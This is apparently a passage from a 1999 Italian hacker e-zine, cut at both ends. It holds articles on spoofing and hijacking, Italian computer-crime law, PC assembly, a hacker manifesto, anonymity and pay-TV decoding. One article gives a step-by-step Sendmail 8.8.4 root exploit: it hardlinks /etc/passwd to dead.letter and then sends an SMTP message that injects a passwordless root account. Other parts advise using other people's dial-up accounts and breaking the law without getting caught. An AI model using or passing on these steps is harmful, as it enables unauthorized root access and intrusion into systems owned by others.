100.100.100.2 > 100.100.100.1 SEQ:1233156198 ACK:0
(TTL:255, Window:255) Flags: -S----

100.100.100.2 < 100.100.100.1 SEQ:2444444444 ACK:1233156199
(TTL:255, Window:511) Flags: -S--A-

100.100.100.2 > 100.100.100.1 SEQ:1233156200 ACK:2444444445
(TTL:255, Window:91925) Flags: ----A-

(numeri a cavolo a parte, lo skema può variare leggermente da Sniffer a sniffer)
in questo caso Š sempre il 3 way handshake...

Comunque, lo sniffing pu• essere combinato allo spoofing per ottenere l'

------------------------7) Hijacking

Hijacking Š un termine coniato durante il proibizionismo in america che
consisteva nel rapinare i contrabbandieri di alcoolici. Sul mio vocabolario
c'Š scritto anche: Rapinare, fare il doppio gioco.
Ora, tralasciando le origini del termine, che cosa Š oggi l'hijacking???
Mettiamo che voi vi connettiate ad un host da un ip spoofato, e poi che
sniffiate le risposte che l'host manda all'ip che avete scelto voi per
spoofare. Bene, questo Š hijacking. Anche qui non mi dilungo molto, visto
che c'Š sempre il buon vecchio Astalavista e poi nell'articolo di Bretch
sullo spoofing c'Š, oltre ai sorgenti della spoofit, anche un telnet hijacker,
se non mi sbaglio.
Bene, sono giunto alla

------------------------8) Conclusione

Spero di avervi delucidato un po le idee sull'argomento masquerading/spoofing
(che, ahinoi, al giorno d'oggi molti prendono per la stessa cosa), se ci sono
errori vi prego di segnalarmeli (non errori di ortografia, naturalmente :))
e cercher• di mandare un errata corridge.
Naturalmente le cose che ho detto sulla Microsoft© e sulla Sun Microsystem©
spesso sono esagerazioni (anzi, sempre), anche perch‚ io uso linux solo quando
devo fare sniff e spoof, ma per il resto uso sempre Windows 98, che Š molto
pi— semplice. Mi scuso per aver insultato il gruppo "IL TIMONE" (tutti sanno
che se uno cade dal seggiolone da piccolo difficilmente si riprenderÂ…)
e spero che un giorno si accorgeranno che anche se fermano uno di noi, non
possono fermarci tutti.

Ma ora, prima della rubrica dedicata alla sessualitÂ…, vediamo quali sono i
libri della settimana (Piero Angela RULEZ!!! :)):

-TCP/IP Illustrated (saga in 3 volumi di cui non ne ho letto manco uno)
-TCP/IP for dummies (per chi non si vuole sorbire i 3 TCP/IP Illustrated ma
che, come si deduce dal titolo di questo libro, Š uno stupido)
-La mia lunga strada dall'inferno (The long hard road out of hell)... Ok, il
libro di Marilyn Manson non c'entra n kakka, ma Š molto bello vedere come
riceve le "ali"...
-I 2 libri di Bill Gates©, perch‚ sar… anche scemo lo zio Bill ma Š fuRRRRBo
-L'albero della vita per voi poveretti che ancora non sapete come nascono i
bambini
-Mein Kampfh (si scrive cos?) di Adolf Hitler per vedere che era davvero
un pazzo
-Tutti i libri di Stephen king che Š un MITOOOOOO!
-I libretti dei CD dei Marilyn Manson (ce li avete, vero??? ;))

Alla prossima!

Mr_Skull

FalsitÂ…
FalsitÂ…
RealtÂ… falsificate
Tutte in fila come spugne in attesa
di assorbire le realtÂ… terziarie della vita
-Brian Warner


ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

for the great members of
@-,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,-@
| _ _ ____ _ |
| | \ | | _____ _| __ )(_) ___ ___ |
-+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+-
: | |\ | __/\ V V /| |_) | | __|__ \ :
| |_| \_|\___| \_/\_/ |____/|_|\___|___/ |
@-,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,.,”i''i'”,-@

Allora, escludendo tutte le possibili ammirazioni che potrei fare sulla
vostra e-zine (n.r. uaaa maro' stu' zine e' propeto ruoss', con noto accento
meridionale..) passiamo alle cose serie.
vorrei iniziare a far parte del vostro gruppo :)
Cero, si, si lo so che inquesto preciso momento dite "ma chi lo conosce a
questo, quasi quasi ci spediamo un pacco bomba a casa e la facciamo finita"
.
purtroppo per voi la cosa non e' cosi' semplice per due semplici motivi :
1) non sapete dove abito e
2) mi sono dimenticato di dirvi che sono superman (no, forse superman no) sono
l'incredibile hulk (forse con la pancetta ci sono :)
forse potrei essere Mac Gyver.. si', ho deciso, sono proprio lui.
Sigla : papapa parapa paap parpapapra (mi pare faccia proprio cosi')
Allora precisando due cose :
1) non e' che mi possa definire un vero hacker, ne' un craker, ne' un
programmatore, ne' un phreaker, ne' un essere mitologico. Vabbe' allora che
scrivi a fare, mi direte voi ..
sono semplicemente un newbies :) non ho mai bucato il pentagono, ne' il norad,
ne' il sito di mtv, comunque potrei avere le conoscenze per bucarli (almeno
quello di mtv).
Sto' pian piano assimilando le tecniche di hacking e di phreaking come Luke
Skywalker quelle della forza jedi. Per quel che riguarda la programmazione,
purtroppo, so solo il fortran, e forse l'anno prox parto con il matlab. non
so a chi possa servire ma comunque...
2) potrei scrivere di cazzate e non (droga, alcool, anarky, bombe) il tutto
mischiato a quello che so di hack e varie.
fatemi sapere la mia e-mail is : hiceman@hotmail.com

Per ora vedete se questo vi piace :

|
|.|
|.|
|\./|
|\./|
. |\./| .
\^.\ |\\.//| /.^/
\--.|\ |\\.//| /|.--/
\--.| \ |\\.//| / |.--/
\--.|\ |\./| /|.--/
\--.|\ |\./| /|.--/
\ .\ |.| /. /
_ -_^_^_^_- \ \\ // / -_^_^_^_- _
- -/_/_/- ^ ^ | ^ ^ -\_\_\- -

////////////////////////////////S_A_S_H_A\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
||||||||||||||||||||||||||||||||S_A_S_H_A|||||||||||||||||||||||||||||||||||||||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S_A_S_H_A///////////////////////////////////////

Beh, di solito questi articoli iniziano con cose del tipo "sono stato
contattato da ***** che ha contattato ***** e che mi ha chiamato. grazie *****
Io invece dovro' iniziare cosi' : nessuno mi ha contattato, nessuno ha
contattato un'altro che poi mi ha contattato. sono (forse) su questa e-zine
perche' ho scritto io. Grazie a me :)

Salve sono Troy Mclure vi ricorderete di me in azioni hacker come "
hackerando
sotto la pioggia" oppure "hackerate il computer del soldato Ryan".
Oggi parliamo dalle leggi italiane che ci interessano da vicino.
Premetto che non studio giurisprudenza ma chimica :) Purtroppo ci sono delle
cose che si devono sapere. Proprio come le leggi italiane. Hacker novelli
come me sono presi da film hackers o wargames sanno che in america ad essere
un hacker potresi quasi finire sulla sedia elettrica. Qui le cose sono un po
diverse : anche perche' l'italia non ha tutte le risorse dell'america : avete
mai visto voi una scuola collegata in rete, dove potete cambiare l'allarme
antincendio? (hackers)
oppure sapete dove cambiare il timer dei semafori? (sempre hackers).
Comunque non e' che qui ci vadano molto piu' piano con le condanne.

Per prima cosa una importantissimissimissima :
PER IL CODICE CIVILE VIENI CONDANNATO PER QUALSIASI COSA CHE FAI :(
PER IL CODICE PENALE SE COMMETTI UN CRIMINE CHE NON HA UNA LEGGE PENALE, NON
TI POSSONO CONDANNARE :)
Cio' implica che prima di fare qualsiasi cosa vedete se c'e' la legge apposita,
se c'e' fatelo senza farvi beccare, se non ci dovesse essere la legge....
chiamatemi, verro a farlo con voi(qualsiasi cosa dovrete fare :)

Vediamo le leggi :

c.p legge 420

l'arresto in fragranza e' obbligatorio (se non vi colgono sul fatto potete
sempre fare finta di niente.)
il fermo e' cosentito
la competenza e' del tribunale
si procede d'ufficio

Attentato a impianti di pubblica utilita'.

Chiunque commette un fatto diretto a danneggiare o distruggere impianti di
pubblica utilita', e' punito, salvo che il fatto costituisca piu' grave reato,
con la reclusine da uno a quattro anni.
La pena si applica anche a chi commette un fatto diretto a danneggiare o
distruggere un sistema informatico o telematico di pubblica utilita', ovvero
dati, informazioni o programmi in esso contenuti o ad essi pertinenti.

P.S = potete anche svotargli il cestino per fargli un favore e vi beccate
la gabbia
-----------------------------------------------------------------------------
c.p 615
l'arresto in fragranza e' facoltativo
il fermo non e' consentito (potete anche emigrare alle haway)
la competenza e' del pretore
si procede con querela e poi d'ufficio

Accesso abusivo ad un sistema informatico o telematico.

chiunque abusivamente si introduce in un sistema informatico o telematico
protetto da misure di sicurezza, ovvero vi si mantiene contro la volonta'
espressa o tacita di chi ha il diritto di escluderlo, e' punito con la
reclusione fino a tre anni.
la pena della reclusione e' da uno a cinque anni :
1)se il fatto e' commesso da un pubblico ufficiale o da un incaricato di un
pubblico servizio, con abuso di poteri o con violazione dei doveri inerenti
alla funzione o al servizio , o da chi esercita anche abusivamente la
professione di investigatore privato, o con l'abuso della qualita' di
operatore di sistema;
2)se il colpevole per commettere il fatto usa violenza sulle cose o alle
persone;
3)se dal fatto deriva la distruzione o il danneggiamento del sistema o
l'interruzione totale o parziale del suo funzionamento;
Qualora i fatti riguardino sistemi informatici o telematici di interesse
militare o relativi all'ordine pubblico o alla sanita' o alla protezione
civile la pena e' da tre a otto anni.

-----------------------------------------------------------------------------
c.p 615-4

Detenzione e diffusione abusiva di codici di accesso a sistemi informatici o
telematici.

Chiunque al fine di procurare a se' o ad altri un profitto o di arrecare ad
altri un danno, abusivamente si procura, riproduce, diffonde, comunica o
consegna codici, parole chiave o altri mezzi idonei all'accesso ad un sistema
informatico o telematico protetto da misure di sicurezza,
o comunque fornisce indicazioni o istruzioni idonee al predetto scopo, e'
punito con la reclusione sino a un anno e con una multa sino a lire dieci
milioni.

-----------------------------------------------------------------------------

c.p 615-6

Diffusione di programmi diretti a danneggiare o interrompere un sistema
informatico.

Chiunque diffonde, comunica o consegna un programma informatico da lui stesso
o da altri redatto, avente per scopo o per effetto il danneggiamento di un
sistema informatico o telematico, dei dati o dei programmi in esso contenuti
o ad esso pertinenti e' punito con la reclusione sino a due anni e con una
multa sino a lire venti milioni.

-----------------------------------------------------------------------------

c.p 617-4

Intercettazione, impedimento o interruzione illecitadi comunicazioni
informatiche o telematiche

Chiunque fraudolentemente intercetta comunicazioni relative a un sistema
informatico o telematico o intercorrenti tra piu' sistemi, ovvero le impedisce
o le interrompe, e' punito con la reclusioneda sei mesi a quattro anni.

-----------------------------------------------------------------------------

Beh, queste sicuramente non sono tutte ma sono quelle che io ho ritenuto piu'
importanti. A vederci ad una prossima volta, newbies favorevoli.

S_A_S_H_A
Mi potete trovare su #ahccc
Mi potete scrivere a hiceman@hotmail.com

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ GUIDA ALL' ASSEMBLAGGIO DI UN COMPUTER DALLA A ALLA Z ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

DISKLAIMER:io Devil_666 non mi prendo nessuna responsabilita'
per eventuali danni che potreste causare al vostro pc seguendo cio'
che viene detto in questa guida....insomma + o - e' kosi' no ??!!

1a PUNTATA: Montaggio di RAM & PERIFERICHE

Che dite ??!! No non vi ho preso per deficenti :) lo so benissimo che
ram e schede varie ve le sapete montare anke da soli......ma sapete kom e'...
bisogna iniziare da qualcosa di facile ;D

<><>RAM<><>
Allora, il primo problema per la ram e' l'acquisto: infatti esistono molti tipi
di ram ed ovviamente ce n'e' solo un tipo che funzia sul nostro picci', quindi
vediamo un po' che ka>>o di ram dobbiamo rubare...ehm.....volvevo dire
komprare per la nostra macchina. La prima distinizione e' fra SIMM e DIMM...le
prime sono quelle un po' + vecchie ormai poko prodotte ma ugualmente usate sui
picci' un po' + vecchi, mentre le seconde sono usate a partire generalmente da
pentium 200...
Kome riconoscerle??? E'facile...le simm sono + corte ed hanno solo 72 pin
(contatti va meglio ?? ;D) mentre le dimm sono + lunghe ed hanno 168 pin.
Aprendo il picci' le potete rikonoscere xche' le simm hanno i morsetti che le
tengono il ferro, memtre le dimm in plastika. Questa era la prima distinzio
ne...poi all'interno delle dimm c'e' da distinguere fra ram a 100 mhz e dimm
normali. Quelle a 100 mhz vengono usate su schede madri che hanno un clock
di 100 o + mhz e sono le + veloci in assoluto le altre dimm servono x le
altre motherboard. Se komprate dimm da 100 mhz e le montate su una scheda
madre con clock inferiore ai 100 mhz tutto vi funzionera' ugualmente ma la
spesa sara' + alta; questo puo' essere conveniente se avete in previsione di
sostituire anke la scheda madre......cosi' quando lo farete avrete gia' le ram
adatte al nuovo hadware (parolone eh?).
Ora che vi ho spiegato un po' kome scegliere le ram adatte al vostro picci' vi
diko kome montarle (lo so che e' una ka<<ata e riesce a tutti ma ve lo diko
uguale :PPP).
Allora, dopo che avete aperto il case, cerkati gli alloggiamenti per le ram...
prendete un banco di ram che dovete montare e appoggiatene la base
nell'apposita fessura tenendolo inclinato verso l'esterno......a questo punto
non vi rimane che spingere il banko ram verso l'interno del picci' fino a che
sentirete il click dei ganci che hanno blokkato la ram......o il click del
gancio che si e' stronkato in 2 ;D......cmq non vi preoccupate, montare le
ram e' un'operazione estermamente semplice che, anke se non avete mai fatto,
sarete in grado di fare in poki minuti. Beh, x quanto riguarda le ram penso
possa bastare no ??!!

<><>PERIFERICHE VARIE<><>
Il mantaggio di schede varie tipo audio video ecc.......e' ankora + facile di
quello delle ram.
L'unika cosa alla quale bisogna stare attenti e' all'acquisto di una scheda
che il nostro picci' possa accettare (non vi sto a dire che ve ne fate di una
scheda video agp 4x quando il vostro picci' e' un katamarano che ha x miracolo
i supporti x le pci.........:D) cmq sikuramente lo sapevate gia'....=).
Allora, una volta acquistata la scheda, non resta altro che rimuovere lo
sportelletto in metallo dietro il picci' in korrispondenza dello slot nel
quale si vuole montare la nostra scheda, inserire la scheda nello slot e
fissarla kon la vitina apposita.
Poi si puo' rikiudere il kase e dopo aver kollegato i kavi appositi alla
nostra nuova periferica si possono installare i driver necessari al suo
funzionamento ed il gioco e' fatto.
Ca<<o com era difficile eh ??!! :PPP

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

Vabbe' newbies per questa uscita e' tutto; sui prossimi numeri dovreste
trovare montaggio di hard disk, elettori di cd-rom e floppy kome seconda
puntata, per il finale mi sono lasciato il montaggio di schede madri e
cpu.........Spero non mi passi la voglia di scrivere per questa stupenda
rivista !!!

Ho detto tutto mi pare........se avete bisogno di chiarimenti o volete darmi
consigli, idee, farmi notare errori e dimenticanze scrivete pire a:
devil666@hotmail.com --> Devil_666

Consiglio: mentre qualunque domanda ed elogio e' ben accetto, per critiche ed
offese usate un server smtp e non la vostra kasella e-mail altrimente verrete
mailbombati pesantemente...;D...Eddai scherzo (forse).
Si, ora che ho detto tutte le ka<<ate che avevo da dire non mi resta altro
che salutarvi sperando che questo articolo sia di reale aiuto a qualche
lettore.

L'autore di questo art. Devil_666 vi saluta:
(new)Byezzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz

PS: un grande tnx agli autori du questa e-zine zcools e nobody88 per avermi
concesso la possibilita' di scrivere per newbies........Spero che grazie
ai vostri sforzi riuscirete a mandare avanti questo bel progetto. Byezzzz

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ MANIFESTO DI CARNIFEX ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ecco una lettera arrivatami da un newbies o hacker (non so) di nome Emanuele
che alla sua mail ha allegato un manifesto recentissimo trovato in giro per
la rete e subito sottopostoci per la visione e per la pubblicazione:

---<INIZIO E-MAIL>---
Ciao nObody88, complimenti per la rivista.
Sono un ragazzo al quale e' passato per le mani un articolo molto bello stile
Manifesto hacker, che pero' denuncia anche i veri pirati informatici e mette
in luce vari aspetti interessanti.
E' un documento non molto lungo, quindi se ti piace potresti anche inserirlo
nel tuo prossimo (speriamo che ce ne sia) numero di Newbies.
Il nome di quello che l'ha scritto e' Carnifex, un nome che non ho mai
sentito ne' letto in alcun posto, quindi dovrebbe essere uno nuovo.
In allegato ti mando il file txt.

Ciao,
Emanuele
---<FINE E-MAIL>---
PAURA ?

Non aver paura degli hacker quando ti parlano di crimini informatici,
ne' quando ti dicono che uno e' riuscito ad entrare nella tua banca,
e solo per fortuna non ha scombinato anche il tuo conto; non aver paura
dell'hacker se temi il dilagare della pirateria informatica o se tremi
al sol pensiero che uno di loro si e' preso gioco della N.A.S.A. rubando
un satellite con il computer. Non aver paura di loro come hacker perche'
loro, in realta', hacker non sono.

C'e' forse un po' di ignoranza nella gente, e forse e' un ignoranza indotta,
da coloro che nell'hacker vedono un pericolo, un nemico, un avanzo di galera.
Indotta forse da chi non riesce a prendersela che con gli hacker, ma loro,
vedete, non sono cosi'.
Quelli che chiamate genericamente hacker sono individui di diverse categorie,
che hanno a che fare con gli hacker solo per le conoscenze che hanno, poi
ognuno le mette in pratica come vuole: gli hacker entrando nei sistemi
informatici al solo scopo di capire come funzionano, e i cracker, i pirati
informatici, i lamer entrando nei sistemi informatici al solo scopo di
distruggerli o trarne vantaggi personali.

Qui e' la differenza. E non continuate a trattare gli hacker come criminali,
e non continuate ad aver paura di loro, e non chiamate la polizia se un
giorno un tizio bussa alla vostra porta e dice: - Sono un hacker.
(Mi rimangio l'ultima frase: un hacker non lo direbbe mai, se non altro
perche' un hacker non ammetterebbe di essere un hacker solo per vantarsi o
per far vedere che e' qualcuno)

Che dici? Ancora paura? Paura, ma non piu' degli hacker. Lo scenario e' lo
stesso: gli hacker si sono salvati il culo, ora la colpa di tutto ricadra'
sui pirati informatici, loro ormai sono puliti...ma cosa cambia in realta'?
Dopo tutto questo ambarada'n, a che conclusione si e' giunti?
Per il pover'uomo di provincia, per la massaia, per il direttore di banca,
per il ragazzo che bestemmia perche' il prezzo dei CD e' troppo alto, tutto e'
come prima, cambiera' solo il nome contro cui inveiranno all'unisono: non ci
sara' piu' un bastardo hacker, ma invece un bastardo fuorilegge telematico.
Per tutta questa gente il problema resta...che si puo' fare, allora?
Come si puo' ovviare a tutto cio'?

Esiste un modo...un modo che eliminerebbe i pregiudizi sugli hacker e
falcerebbe la strada ai pirati.
Infatti le sole persone che riuscirebbero a colpire al cuore tutti i
malviventi nella Rete sarebbero chi conosce la loro vita, chi conosce i loro
punti di forza e i loro punti deboli, chi sa che cosa fare e quando farla.
Chi come loro sa ma a differenza di loro non fa. E chi, se non gli hacker?
Essi, in nome di una dignita' che e' stata loro tolta, dovrebbero unirsi per
fare a pezzi tutti coloro che con l'illegalita' sulla Rete ci vivono, coloro
che rovinano il duro lavoro altrui.
Perche' non farlo? I problemi sarebbero presto risolti, e vero e' che alcuni
gruppi di hacker si stanno gia' battendo per far diventare Internet un "
posto"
piu' sicuro, piu' piacevole e adatto a tutti, disgregando ad esempio le
associazioni di pedofili.

E tu, banchiere, la cui vita dipende dall'integrita' di alcuni computer, hai
ancora paura degli hacker?

(by Carnifex-giugno 1999)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ RENDIAMOCI ANONIMI ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Anonimita' un Sacro diritto di ogni persona cerca un poko di privacy per fare
gli affari suoi nella rete.
Io credo che l'anonimita' tolale nella rete non esista ... kome e'successo
anke ai migliori competenti sysadmin , associazioni e corporazioni hanno
saputo rintracciare anke il log piu' remoto....

Cmq cerchiamo di nasconderci un poko nella rete cosi' per avere la nostra
privacy..

Allora idee che mi sono venute in mente [o meglio una struttura alquanto
sicura per nascondersi]

chiamiamo il nostro caro provider con account di altri ovviamente
e colleghiamoci poi entriamo nella nostra shell preferita e da essa
colleghiamoci col caro comando dial alla notra bbs preferica collegata
alla rete ora siamo un poko + anonimi e ci sentiamo molto meglio hehehe.

idee sono ben accette su ste 4 cose che detto

ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ IL MIO EXPLOIT PREFERITO... SM 8.8.4 !!! ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Va beeeeeneeeee...allora le dediche e le contro dediche...come
sempre....

Thi$ 4rT is DeD 2 : lo spagnolo che sulla spiaggia mi ha kiesto
di fargli una foto !!!

P.S. Anche alla figlia dello spagnolo....a cui avrei volentieri
fatto qualkosa che la sua nazionalita' suggerisce...vabbe'

Thi5 aRt is Vs-d3d To : Dante Alighieri che come lo stronzo al
suo "
grazias" ha risposto con un "prego"
invece del suo solito "
de nada"

Bhe..ora vi parlo del mio exploit preferiiiiiitoooooo...troppo
BeLLo !!!!!!

Beh..penso sappiate tutti qual'e' il + bacato dei programmi..
se non lo sapete questo bellissimo programmino
e' il SendMail..programma di posta elettronica tra i + usati.
Bene in questo articolo vi parlero' dell'exploit per guadagnare
privilegi da root su di un sistema avente caricato questo
programma nella sua versione 8.8.4 dehihohuuuu...miticooooo!!!

Per usufruire dell'exploit avrete bisogno di avere gia' un altro
account...se no vi sparate le pippette...sigh.

Allora avete l'account...e telnettandovi al server sulla porta 25
scoprite che il suo sendmail e' nella versione 8.8.4...benissimo...
siete a CavaLLuccio marino !!!
cosa fare ora ???

Entrate nel server telnettandovi col vostro account, e date il
comando

ln /etc/passwd /var/tmp/dead.letter

a cosa serve ???...boh?!?!...scherzo...ora ve lo spiego...
avete semplicemente linkato il file dove vanno a finire
le lettere perse al file di pass....a cosa ci e' servito ???
Bene...quello che vi sara' scritto in ogni e-mail andata persa
verra' trascritto nel file passwd.
A che pippozza mi serve ???..ora ve lo spiego...aspettate e vedrete!!!

telnettatevi sulla 25
ed impartite i seguenti comandi:

mail from: che@godo.com
rcpt to: questo@exploit.com
data
homer::0:0:ihih ohoh:/root:/bin/bash
.
quit

Avrete cercato di mandare una lettera ad una casella
che si chiama questo@exploit.com....ovviamente non esiste!!!!
Allora il sistema che fa ???
prende il contenuto dell'e-mail
(homer::0:0:ihih ohoh:/root:/bin/bash)
e la aggiunge al passwd...vi sarete cosi' creati un account
da root con login homer e senza alcuna pass.
+ facile di cosi' si muore !!!!
Ciao BeLLi....e alla prossiminaaaaaaa !!! Ciaoooooooooo

bye bye Dante Alighieri...NeWBiEs StaFf...

08V|0U5 : 54|NT 59|R|T5 !!!!

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ TELEPIU' TERRESTRE: INFO VARIE ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

CONSUMO: un sorso di Johnny Walker e un decoder t+ stravolto dai miei inutili
sperimenti
MUSICA ASCOLTATA: Sigle dei cartoni animati rifatte da "
Gli amici di Roland"
in versione Rockeggiante

Allora oggi mi sono alzato di buon umore, anche se fa un caldo boia e sto
schiattando dell'afa.
Ho deciso di scrivere questo articolo per mettere in chiaro quattro cosette
riguardo le radio-televisioni private codificate in particolare di t+.
Inizio col dire che non so se le cose che mi appresto a scrivere siano
legali o meno ma non penso che faccia molta differenza.

L'emittente telepiu' trasmette sia via satellite sia tramite il classico
decoder terrestre. In questo articolo approfondiro' le tecniche di
decriptaggio tramite decoder terrestre.
Pronti . .. . via!
T+ trasmette il proprio segnale (Audio e Video) tramite un sistema di
crittografia IRDETO che e' l'azienda che ha elaborato e introdotto i decoders
Comcrypt e Cablecrypt.
Tutte le info che troverete in questo articolo funziona non solo con t+ ma
anche con le altre emittenti (straniere) che utilizzano la stessa tecnologia.
Questo sistema di codifica di immagini e suoni nasce in due momenti separati:
per quanto riguarda l'audio il sistema di crittografia nasce nei primi anni
80 quando ancora non si utilizzava la crittografia per la televisione e
contemporaneamente alla nascita di Videocrypt e Eurocrypt.

Ma come funziona l'algoritmo di codifica Audio Video??
La questione, dal punto di vista teorico, non e' per niente difficile.
Innanzitutto una premessa rapida: la Tv di casa nostra, per ricevere e
visualizzare correttamente i segnali trasmessi hanno bisogno di essere
sincronizzati. Senza una sincronizzazione verticale e orizzontale i singoli
punti del fotogramma non troverebbero una posizione precisa e l'immagine
risulterebbe in continuo movimento per lo schermo. Una delle cose che fa
l'encoder (Non il decoder) e' questa: distorcere l'immagine. Altra cosa che
fa l'encoder e' quella di cambiare polarita' dell'immagine in ordine
pressoche' casuale (il colore bianco diventa nero e cosi' via . . .). La
funzione del decoder e' appunto sapere come le immagini sono distorte e
polarizzate in modo da saperle ricostruire rapidamente. Come dicevo prima
questo sistema di criptaggio del segnale video e' abbastanza vecchiotto ma
ancora largamente utilizzato. Tuttavia questo metodo e' totalmente insicuro
e cosi' decriptare il segnale video e' molto semplice. (non correte bei
fiuliti . . continuate a leggere . . ahahaeheheha)
Per quanto riguarda l'audio il discorso e' completamente diverso. Per le mie
conoscenze poco tecniche posso sicuramente dirvi che non esiste alcun modo
per ricevere l'audio modificando il proprio decoder terrestre. Si' puo'
utilizzare una scheda Tv conessa al picci' ma non conosco metodi di modifica
dei decoders. Per quanto riguarda le informazioni tecniche su tutti i tipi
di decoders e sugli algoritmi di criptaggio audio video vi rimando al sito
Republic che purtroppo non trovo piu' (cercate "
Republic cablecrypt " e
troverete cio' che cercate. In questo sito c'e' una bellissima guida tecnica
(arrivata alla seconda edizione) che tratta in modo quasi scientifico la
tecnologia Irdeto.

E ORA . . . . . rulli di tamburo. . . .. . .
. . . . piu' forte . . . . . . .. . . .. . . .un po' meno . . . . . . . . OK!

Come decriptare TeLePIU'
